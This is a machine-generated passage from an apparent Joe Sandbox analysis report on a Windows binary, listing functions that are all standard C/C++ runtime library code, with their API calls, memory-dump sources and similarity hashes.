                                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                          • Opcode ID: 8e9ad44cd36b5df411ddc0e9360032e1cf212b9573cf9d37d849956e2b7208c3
                                                                                                                                                                                                                                                                          • Instruction ID: 559fbc1974bf0f10ba3a4e57278cabd79a0c1e92a8a84e0df616f30746cd2d79
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8e9ad44cd36b5df411ddc0e9360032e1cf212b9573cf9d37d849956e2b7208c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF0171322093115EAA2836B8BC8596B2A95FB12775F24023DF610D5DF2EB554C019392
                                                                                                                                                                                                                                                                          Function 0088FB24 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 0088FC43
                                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 0088FEBC
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                          • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                          • Opcode ID: 16f1728ddcc8eaabb820243a9be909e251dec150e7a593264c15d811db62fd25
                                                                                                                                                                                                                                                                          • Instruction ID: 8e273917b4b602e81e6a17de2afb821d772a1fc9b46d08c25ee90e354cb98918
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 16f1728ddcc8eaabb820243a9be909e251dec150e7a593264c15d811db62fd25
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6CB15A71900219DFCF14EFA8C8819AEBBB5FF14310F14416AEA11EB217D735EA61CB92
                                                                                                                                                                                                                                                                          Function 0088A53C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,A9416E27,?,?,00000000,008A0244,000000FF,?,0088A5FD,0088A4E4,?,0088A699,00000000), ref: 0088A571
                                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0088A583
                                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,008A0244,000000FF,?,0088A5FD,0088A4E4,?,0088A699,00000000), ref: 0088A5A5
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                          • Opcode ID: ca63eb7b27fd81bb5e7b077452b5c5cacf07792027ac7987d6ac5fe7bea9f4e7
                                                                                                                                                                                                                                                                          • Instruction ID: 9027990c797eb427b1a3fc1988f9fbceef16400df1aa986bc128ca8852b94153
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ca63eb7b27fd81bb5e7b077452b5c5cacf07792027ac7987d6ac5fe7bea9f4e7
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA01A731900615AFEB059F80DC09FAE7BB8FB05711F040525E811E2AD0DB789D40CF91
                                                                                                                                                                                                                                                                          Function 00891BCD Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00891C52
                                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00891D1B
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00891D82
                                                                                                                                                                                                                                                                            • Part of subcall function 008904C1: RtlAllocateHeap.NTDLL(00000000,?,?,?,0088119F,?,?,008731F2,00001000,?,0087313A), ref: 008904F3
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00891D95
                                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 00891DA2
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1423051803-0
                                                                                                                                                                                                                                                                          • Opcode ID: 0df5ff953d63976bf2f19710af97d508f2ff86b07f98cc8e9d552fef4c041784
                                                                                                                                                                                                                                                                          • Instruction ID: c044d81329905e2700ec53e0ed89513cec9d28037551a25445b1a2e2bcd95702
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0df5ff953d63976bf2f19710af97d508f2ff86b07f98cc8e9d552fef4c041784
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14517C7260520BAFEF21BFA4CC89EBB3BAAFF44714B1D0529F909D6151EB30DC508661
                                                                                                                                                                                                                                                                          Function 0088388E Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 008838A2
                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 008838C1
                                                                                                                                                                                                                                                                          • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 008838EF
                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 0088394A
                                                                                                                                                                                                                                                                          • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,0088386B,?,00000000,?,0087B20C,?,?,0087D57E), ref: 00883961
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AcquireExclusiveLock$CurrentThread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 66001078-0
                                                                                                                                                                                                                                                                          • Opcode ID: 22e7f08da66dfece0034154846b2a22fe98e2fa323c9f2cd8f4099ed3b5f6d8c
                                                                                                                                                                                                                                                                          • Instruction ID: 0ee8844655fde97f7a3e6828e973265889d9eeae3c6d53b86b05b3564236ae6c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 22e7f08da66dfece0034154846b2a22fe98e2fa323c9f2cd8f4099ed3b5f6d8c
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F416E71500A0ADFCB20EF69C98496AFBF4FF0AB10B504A29E446D7940E7B0FB85CB51
                                                                                                                                                                                                                                                                          Function 0088184C Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00881853
                                                                                                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 0088185E
                                                                                                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 008818CC
                                                                                                                                                                                                                                                                            • Part of subcall function 00881755: std::locale::_Locimp::_Locimp.LIBCPMT ref: 0088176D
                                                                                                                                                                                                                                                                          • std::locale::_Setgloballocale.LIBCPMT ref: 00881879
                                                                                                                                                                                                                                                                          • _Yarn.LIBCPMT ref: 0088188F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1088826258-0
                                                                                                                                                                                                                                                                          • Opcode ID: bab2ce4dd75c1cef30fd6d44f349f771f2132cfd3a9f0f6d918f4de2467f3ed1
                                                                                                                                                                                                                                                                          • Instruction ID: 0fe3792988f97a3a744ddf72ffec65251e4ffa6fb483573b0cdce7468b681ecc
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bab2ce4dd75c1cef30fd6d44f349f771f2132cfd3a9f0f6d918f4de2467f3ed1
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A401D475A002118BEB06FF64D84957C37B9FF86700B184419E81197791DF346E43CB82
                                                                                                                                                                                                                                                                          Function 0089AC01 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0089AC9D,00000000,?,008AEFA0,?,?,?,0089ABD4,00000004,InitializeCriticalSectionEx,008A4F0C,008A4F14), ref: 0089AC0E
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,0089AC9D,00000000,?,008AEFA0,?,?,?,0089ABD4,00000004,InitializeCriticalSectionEx,008A4F0C,008A4F14,00000000,?,0089016C), ref: 0089AC18
                                                                                                                                                                                                                                                                          • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0089AC40
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                          • String ID: api-ms-
                                                                                                                                                                                                                                                                          • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                                          • Opcode ID: 99f755f14312d43ba74392fcab9a2e3ba1c01e87b902648fc05e962d35ee179a
                                                                                                                                                                                                                                                                          • Instruction ID: 6ebbda8993139a3f60981bd67f24ca9de2d7d035fa193eec939aff5d59e1139f
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f755f14312d43ba74392fcab9a2e3ba1c01e87b902648fc05e962d35ee179a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9AE04830684204BBFF182F50EC06F593E55FB11F45F184020F90CEC8E1E761D811CA8A
                                                                                                                                                                                                                                                                          Function 00898366 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.KERNEL32(A9416E27,00000000,00000000,?), ref: 008983C9
                                                                                                                                                                                                                                                                            • Part of subcall function 008905D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00891D78,?,00000000,-00000008), ref: 00890632
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0089861B
                                                                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00898661
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 00898704
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2112829910-0
                                                                                                                                                                                                                                                                          • Opcode ID: 5f69084cbc73110eb3ce24beae850518fd3105a3b7d25fd511ba235405b02944
                                                                                                                                                                                                                                                                          • Instruction ID: 6e7718004c8736e119242c0f39899457a9d5684a593822f0eb80b390867f1a93
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5f69084cbc73110eb3ce24beae850518fd3105a3b7d25fd511ba235405b02944
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34D178B5E00249EFDF15DFE8C8849ADBBB5FF4A314F28412AE516EB351DA30A941CB50
                                                                                                                                                                                                                                                                          Function 0088F84B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: AdjustPointer
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1740715915-0
                                                                                                                                                                                                                                                                          • Opcode ID: 601c42ca085bdc05d7a9791fbbf74ed0f774deb52a0fbe3e8c797eaff0e7dc93
                                                                                                                                                                                                                                                                          • Instruction ID: 092c1d1af08c21ec24689d3d804586e7c163efe01d23fb186b11bffee4702225
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 601c42ca085bdc05d7a9791fbbf74ed0f774deb52a0fbe3e8c797eaff0e7dc93
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B251E272604206AFEB28AF18DD41B7EBBA4FF48714F144539EA05C7692E731EC80CB91
                                                                                                                                                                                                                                                                          Function 00896192 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 008905D1: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00891D78,?,00000000,-00000008), ref: 00890632
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 008961F6
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 008961FD
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00896237
                                                                                                                                                                                                                                                                          • __dosmaperr.LIBCMT ref: 0089623E
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 1913693674-0
                                                                                                                                                                                                                                                                          • Opcode ID: 6266cd46c425570dbef5f2b4cd5828e843ddf56fe98055727fca2ccabc820762
                                                                                                                                                                                                                                                                          • Instruction ID: f214d81f0bf845ee4db6b0dccb7e007e05cac1ade1aecb92d1e163e0c5f30eae
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6266cd46c425570dbef5f2b4cd5828e843ddf56fe98055727fca2ccabc820762
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E219271604209AFDF20FFA5C88182AB7A9FF543647188529F91AD7651FB30EC20CBA1
                                                                                                                                                                                                                                                                          Function 008872A2 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2332770685.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332733034.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332838799.00000000008A1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332880256.00000000008AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332924364.00000000008AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2332969362.00000000008B1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333013601.00000000008B4000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2333074860.00000000008D9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_870000_aD7D9fkpII.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 5e20cac9c9cc1a66c0a9a74a81e5ff32a6d400568f117845d22eda346bdc7383
                                                                                                                                                                                                                                                                          • Instruction ID: e7ec5f6e5c2bbe5eccabc580511fb94b3c284434f6382091b1f25b27e7b62089
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e20cac9c9cc1a66c0a9a74a81e5ff32a6d400568f117845d22eda346bdc7383
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3219271608209AFDB20FFA5C881D6AB7B9FF503647604528FD16D7751E730EC00A7A2
                                                                                                                                                                                                                                                                          Function 00897588 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetEnvironmentStringsW.KERNEL32 ref: 00897590
